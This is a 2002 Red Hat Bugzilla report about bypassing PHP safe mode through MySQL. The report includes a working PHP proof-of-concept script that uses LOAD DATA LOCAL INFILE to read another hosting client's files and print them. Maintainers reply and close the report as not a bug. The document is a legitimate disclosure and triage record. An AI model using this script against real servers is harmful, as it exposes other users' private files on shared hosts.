Bug 59916

Summary: PHP in safe mode can read all the server contents
Product: [Retired] Red Hat Linux Reporter: Renato <renato>
Component: mysqlAssignee: Patrick Macdonald <patrickm>
Status: CLOSED NOTABUG QA Contact: David Lawrence <dkl>
Severity: medium Docs Contact:
Priority: medium    
Version: 7.2Keywords: Security
Target Milestone: ---   
Target Release: ---   
Hardware: i386   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2002-02-27 13:53:57 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description Renato 2002-02-14 20:26:06 UTC 
From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)

Description of problem:
By using a flaw in PHP+Mysql query, somebody can bypass safe mode. 

Version-Release number of selected component (if applicable):


How reproducible:
Always

Steps to Reproduce:
1. Use the script:

$host = 'localhost';
$user = 'root';
$pass = 'letmein';
$db   = 'teste';

$filename = '/home/othercliente/myscript.php';     /* File to grab from [local] 
server */
$local = true;                      /* Read from local filesystem */

$local = $local ? 'LOCAL' : '';


$sql = array (
   "USE $db",

   'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',

   "LOAD DATA $local INFILE '$filename' INTO TABLE $tbl FIELDS "
   . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
   . "ESCAPED BY          '' "
   . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",

   "SELECT a FROM $tbl LIMIT 1"
);

Header ('Content-type: text/plain');

mysql_connect ($host, $user, $pass);	

foreach ($sql as $statement) {
   $q = mysql_query ($statement);

   if ($q == false) die (
      "FAILED: " . $statement . "\n" .
      "REASON: " . mysql_error () . "\n"
   );

   if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;

   echo $r [0];
   mysql_free_result ($q);
}

2. Call the script using wget http://server/script

Actual Results:  You can view the source of the other client

Additional info:
Comment 1 Phil Copeland 2002-02-14 21:28:13 UTC 
rpm -q php
I need to know which one it is please 

cheers

Phil
=--=
Comment 2 Renato 2002-02-15 10:40:35 UTC 
php: 4.0.6-7
php-mysql: 4.0.6-7

It's configured as a module in Apache.
Comment 3 Peter Bowen 2002-02-27 13:53:52 UTC 
This is not a bug in PHP.  This is a potential bug with MySQL, but php' safe
mode cannot prevent this.  PHP can only protect internal php functions, and
mysql_* use the mysql client library.  I'm moving this to the MySQL component,
as it can only be handled there.
Comment 4 Trond Eivind Glomsrxd 2002-04-08 19:31:47 UTC 
This is not a bug in mysql, it does what you want and it can do. Don't set up
unsafe scripts